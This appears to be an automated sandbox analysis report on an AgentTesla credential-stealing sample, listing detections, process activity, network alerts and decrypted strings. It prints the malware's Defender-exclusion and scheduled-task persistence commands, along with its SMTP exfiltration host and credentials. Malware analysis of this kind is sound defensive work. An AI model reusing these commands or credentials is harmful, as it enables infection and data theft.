Edit tour

Windows Analysis Report
LisectAVT_2403002A_16.exe

Overview

General Information

Sample name:LisectAVT_2403002A_16.exe
Analysis ID:1482478
MD5:2c10cb6c2e23b7712ebf4042d669cd09
SHA1:f86adb59bd065afd9195b9375271096f341842dc
SHA256:546569a42f00553d7fda79e6961779afadd95ea8e6a8738ef344275f2b642244
Tags:AgentTeslaexe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Sigma detected: Scheduled temp file as task from temp location
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • LisectAVT_2403002A_16.exe (PID: 6668 cmdline: "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe" MD5: 2C10CB6C2E23B7712EBF4042D669CD09)
    • powershell.exe (PID: 7244 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7768 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 7272 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 7316 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NxmtwwVGOtEdjd" /XML "C:\Users\user\AppData\Local\Temp\tmpB5CB.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • LisectAVT_2403002A_16.exe (PID: 7532 cmdline: "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe" MD5: 2C10CB6C2E23B7712EBF4042D669CD09)
    • LisectAVT_2403002A_16.exe (PID: 7544 cmdline: "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe" MD5: 2C10CB6C2E23B7712EBF4042D669CD09)
  • NxmtwwVGOtEdjd.exe (PID: 7680 cmdline: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe MD5: 2C10CB6C2E23B7712EBF4042D669CD09)
    • schtasks.exe (PID: 7912 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NxmtwwVGOtEdjd" /XML "C:\Users\user\AppData\Local\Temp\tmpCD2C.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • NxmtwwVGOtEdjd.exe (PID: 7964 cmdline: "C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe" MD5: 2C10CB6C2E23B7712EBF4042D669CD09)
    • NxmtwwVGOtEdjd.exe (PID: 7972 cmdline: "C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe" MD5: 2C10CB6C2E23B7712EBF4042D669CD09)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{
  "Exfil Mode": "SMTP",
  "Host": "mail.mbarieservicesltd.com",
  "Username": "saless@mbarieservicesltd.com",
  "Password": "     *o9H+18Q4%;M     "
}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    SourceRuleDescriptionAuthorStrings
    0000000F.00000002.2902484873.0000000002D3A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000009.00000002.2898350883.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
        00000009.00000002.2901886951.0000000002ECA000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          0000000A.00000002.1787617220.0000000004500000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
            00000000.00000002.1723431532.00000000041AF000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
              Click to see the 12 entries
              SourceRuleDescriptionAuthorStrings
              10.2.NxmtwwVGOtEdjd.exe.45296a0.4.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                10.2.NxmtwwVGOtEdjd.exe.4500680.3.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                  0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                    0.2.LisectAVT_2403002A_16.exe.41d8730.5.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                      10.2.NxmtwwVGOtEdjd.exe.45296a0.4.raw.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                        Click to see the 3 entries

                        System Summary

                        barindex
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe", ParentImage: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe, ParentProcessId: 6668, ParentProcessName: LisectAVT_2403002A_16.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe", ProcessId: 7244, ProcessName: powershell.exe
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe", ParentImage: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe, ParentProcessId: 6668, ParentProcessName: LisectAVT_2403002A_16.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe", ProcessId: 7244, ProcessName: powershell.exe
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NxmtwwVGOtEdjd" /XML "C:\Users\user\AppData\Local\Temp\tmpCD2C.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NxmtwwVGOtEdjd" /XML "C:\Users\user\AppData\Local\Temp\tmpCD2C.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe, ParentImage: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe, ParentProcessId: 7680, ParentProcessName: NxmtwwVGOtEdjd.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NxmtwwVGOtEdjd" /XML "C:\Users\user\AppData\Local\Temp\tmpCD2C.tmp", ProcessId: 7912, ProcessName: schtasks.exe
                        Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 199.79.62.115, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe, Initiated: true, ProcessId: 7544, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49735
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NxmtwwVGOtEdjd" /XML "C:\Users\user\AppData\Local\Temp\tmpB5CB.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NxmtwwVGOtEdjd" /XML "C:\Users\user\AppData\Local\Temp\tmpB5CB.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe", ParentImage: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe, ParentProcessId: 6668, ParentProcessName: LisectAVT_2403002A_16.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NxmtwwVGOtEdjd" /XML "C:\Users\user\AppData\Local\Temp\tmpB5CB.tmp", ProcessId: 7316, ProcessName: schtasks.exe
                        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe", ParentImage: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe, ParentProcessId: 6668, ParentProcessName: LisectAVT_2403002A_16.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe", ProcessId: 7244, ProcessName: powershell.exe

                        Persistence and Installation Behavior

                        barindex
                        Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NxmtwwVGOtEdjd" /XML "C:\Users\user\AppData\Local\Temp\tmpB5CB.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NxmtwwVGOtEdjd" /XML "C:\Users\user\AppData\Local\Temp\tmpB5CB.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe", ParentImage: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe, ParentProcessId: 6668, ParentProcessName: LisectAVT_2403002A_16.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NxmtwwVGOtEdjd" /XML "C:\Users\user\AppData\Local\Temp\tmpB5CB.tmp", ProcessId: 7316, ProcessName: schtasks.exe
                        No Snort rule has matched
                        Timestamp:2024-07-25T23:35:36.103588+0200
                        SID:2022930
                        Source Port:443
                        Destination Port:49737
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-07-25T23:35:25.918768+0200
                        SID:2855542
                        Source Port:49735
                        Destination Port:587
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-07-25T23:35:29.982176+0200
                        SID:2855542
                        Source Port:49736
                        Destination Port:587
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-07-25T23:35:55.569991+0200
                        SID:2022930
                        Source Port:443
                        Destination Port:53201
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-07-25T23:35:56.837685+0200
                        SID:2022930
                        Source Port:443
                        Destination Port:53202
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-07-25T23:35:11.625146+0200
                        SID:2840032
                        Source Port:49736
                        Destination Port:587
                        Protocol:TCP
                        Classtype:A Network Trojan was detected

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Source: LisectAVT_2403002A_16.exeAvira: detected
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeAvira: detection malicious, Label: TR/Kryptik.mzsma
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Host": "mail.mbarieservicesltd.com", "Username": "saless@mbarieservicesltd.com", "Password": " *o9H+18Q4%;M "}
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeJoe Sandbox ML: detected
                        Source: LisectAVT_2403002A_16.exeJoe Sandbox ML: detected
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: /log.tmp
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <br>[
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: yyyy-MM-dd HH:mm:ss
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: ]<br>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <br>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Time:
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: MM/dd/yyyy HH:mm:ss
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <br>User Name:
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <br>Computer Name:
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <br>OSFullName:
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <br>CPU:
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <br>RAM:
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <br>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: IP Address:
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <br>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <hr>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: New
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: MM/dd/yyyy HH:mm:ss
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: IP Address:
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: false
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: false
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: false
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: false
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: false
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: false
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: false
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: false
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: false
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: mail.mbarieservicesltd.com
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: saless@mbarieservicesltd.com
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: *o9H+18Q4%;M
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: iinfo@mbarieservicesltd.com
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: false
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: false
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: appdata
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: KTvkzEc
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: KTvkzEc.exe
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: KTvkzEc
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Type
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <br>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <hr>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <br>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <b>[
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: ]</b> (
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: )<br>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: {BACK}
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: {ALT+TAB}
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: {ALT+F4}
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: {TAB}
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: {ESC}
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: {Win}
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: {CAPSLOCK}
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: {KEYUP}
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: {KEYDOWN}
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: {KEYLEFT}
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: {KEYRIGHT}
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: {DEL}
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: {END}
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: {HOME}
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: {Insert}
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: {NumLock}
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: {PageDown}
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: {PageUp}
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: {ENTER}
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: {F1}
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: {F2}
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: {F3}
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: {F4}
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: {F5}
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: {F6}
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: {F7}
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: {F8}
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: {F9}
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: {F10}
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: {F11}
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: {F12}
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: control
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: {CTRL}
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: &amp;
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: &lt;
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: &gt;
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: &quot;
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <br><hr>Copied Text: <br>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <hr>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: logins
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: IE/Edge
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Windows Secure Note
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: 3CCD5499-87A8-4B10-A215-608888DD3B55
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Windows Web Password Credential
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: 154E23D0-C644-4E6F-8CE6-5069272F999F
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Windows Credential Picker Protector
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Web Credentials
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Windows Credentials
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Windows Domain Certificate Credential
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Windows Domain Password Credential
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Windows Extended Credential
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: 00000000-0000-0000-0000-000000000000
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: SchemaId
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: pResourceElement
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: pIdentityElement
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: pPackageSid
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: pAuthenticatorElement
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: IE/Edge
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: UC Browser
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: UCBrowser\
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Login Data
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: journal
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: wow_logins
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Safari for Windows
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \Common Files\Apple\Apple Application Support\plutil.exe
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \Apple Computer\Preferences\keychain.plist
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <array>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <dict>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <string>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: </string>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <string>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: </string>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <data>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: </data>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: -convert xml1 -s -o "
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \fixed_keychain.xml"
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \Microsoft\Credentials\
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \Microsoft\Credentials\
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \Microsoft\Credentials\
